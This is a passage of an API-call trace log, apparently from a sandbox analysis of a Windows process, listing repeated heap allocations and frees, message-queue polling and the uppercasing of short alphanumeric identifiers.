(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0218.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0218.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0218.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0218.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0218.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0218.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0218.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0218.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0218.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0218.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0218.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0218.037] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0218.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0218.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0218.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0218.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0218.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0218.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0218.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0218.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0218.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0218.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0218.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0218.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0218.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0218.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0218.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0218.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0218.038] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0218.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0218.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0218.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0218.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0218.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0218.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0218.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0218.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0218.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0218.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0218.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0218.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0218.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0218.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0218.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0218.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0218.038] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0218.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0218.038] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0218.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0218.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0218.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab530 [0218.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0218.043] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0218.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0218.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0218.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0218.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0218.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0218.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0218.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0218.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0218.043] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0218.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0218.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0218.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0218.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0218.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0218.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0218.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0218.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0218.044] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0218.044] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0218.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0218.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0218.044] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0218.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0218.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0218.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaba10 [0218.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a743a0 [0218.044] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0218.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0218.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0218.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0218.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0218.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0218.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0218.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0218.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0218.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0218.045] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0218.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0218.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0218.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0218.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0218.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0218.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0218.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0218.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0218.045] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0218.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0218.045] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0218.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0218.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0218.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0218.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0218.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0218.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0218.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0218.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0218.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0218.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0218.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0218.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0218.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a743a0 | out: hHeap=0x2af0000) returned 1 [0218.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0218.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0218.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0218.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0218.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0218.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0218.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0218.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0218.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0218.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0218.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0218.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0218.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0218.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0218.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0218.046] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0218.046] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0218.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0218.046] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0218.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0218.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0218.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab8c0 [0218.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73fb0 [0218.046] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0218.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0218.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0218.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0218.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0218.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0218.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0218.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0218.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0218.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0218.047] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0218.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0218.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0218.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0218.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0218.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0218.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0218.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0218.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0218.047] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0218.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0218.047] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0218.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0218.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0218.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0218.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0218.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0218.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0218.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0218.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0218.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0218.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0218.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0218.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0218.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0218.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0218.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0218.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0218.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0218.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0218.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0218.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0218.048] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0218.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73fb0 | out: hHeap=0x2af0000) returned 1 [0218.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0218.048] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0218.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0218.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0218.048] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.049] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0218.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0218.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0218.049] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0218.049] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.049] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0218.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0218.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0218.049] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0218.049] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0218.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0218.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0218.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0218.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0218.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0218.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0218.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0218.049] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0218.049] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0218.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0218.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0218.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0218.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0218.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 